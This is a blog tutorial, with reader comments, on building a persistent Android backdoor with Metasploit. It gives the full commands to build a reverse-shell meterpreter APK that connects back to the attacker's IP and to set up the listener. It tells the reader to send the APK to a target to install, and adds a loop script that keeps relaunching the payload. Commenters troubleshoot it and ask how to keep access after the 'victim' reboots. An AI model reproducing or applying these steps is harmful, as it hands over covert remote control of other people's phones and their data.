How to make a persistent Android backdoor using Metasploit

How to make a persistent android backdoor using Metasploit

Metasploit is one of the most powerful pentesting and exploitation tools out there,  and in this tutorial,  I’ll show you how to use it to create an access backdoor on any android phone and gain control over it.

DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse. 

Step 0: Fire up Metasploit

If you’re using Kali Linux/BackBox/BackTrack, metasploit comes pre-installed with the system. Otherwise,  you can download it from: https://www.metasploit.com

To start it,  go to your terminal and type:

msfconsole

Wait for sometime,  and the metasploit CUI will start.

Step 1: Create your payload

Open a new terminal and type:

msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk

This will create the actual exploit apk in your root folder.

Step 2: Set up the handler

Now go to the first terminal we opened. The msfconsole should still be open. Type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST <your internal ip>

exploit

A listener should open. Now just keep this listener open and send the apk to your target device. Wait for them to install and voila! You have a backdoor. Now let’s make it persistent!



Step 3: The persistence script.

Go to your root folder and create a new text file.

Write (Don’t copy!) the following lines in it:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Save it as <name>.sh.  sh is important.

Step 4: Upload it!

Go to your exploit meterpreter shell and type:

cd /

cd /sdcard/Download

Check if you are in the correct directory by typing:

ls

You should be in /storage/emulated/legacy/Download

Now upload the script:

upload <name>.sh

Step 5: Execute!

Type:

shell

Now,  go to the place where you uploaded the script:

cd /

cd /sdcard/Download

Now,  type:

sh <name>.sh

Now press ctrl+c to exit shell.

Step 6: Testing!

Close the msfconsole terminal. Open a new terminal and redo Step 2. This time,  your terminal will instantly enter the meterpreter shell.

Done!

Note: The back door persistence will be disabled if the phone reboots.

Related posts

7 Thoughts to “How to make a persistent Android backdoor using Metasploit”

  1. Rohan Juneja

    Argh…..I just can’t get past the step 1. Every time, it just shows this message :
    bash: my_public_IP_address: No such file or directory
    Of course, here, my_public_IP_address means what I really entered as my IP address.
    Please help me out.

    1. Admin

      Haven’t tried this myself, but did u replace your public ip address with your IP? Let’s hope the author will answer you soon 🙂

      1. Rohan Juneja

        Yeah, I did. It didn’t work out at all…

  2. pain_tester

    Hy very nice it work’s !!!

    Any idea for making it persistent after reboot?

    When I reboot the phone I get a session because it start main activity,

    But the shell doesn’t work anymore,

    “Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.”

    Anyone know were is main activity located in after a reboot ?

    Ty

    1. Rohan Juneja

      Hey Pain_tester, Wait, it actually worked? What did you enter in your public IP address? The IP address of the phone? or the Computer? It just isn’t working for me. Can you help me out?

  3. aditya

    Error: Activity not started, unable to resolve Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10000000 pkg=–user }

  4. Tono

    Not work after reboot the victim
    help me please……

Leave a Comment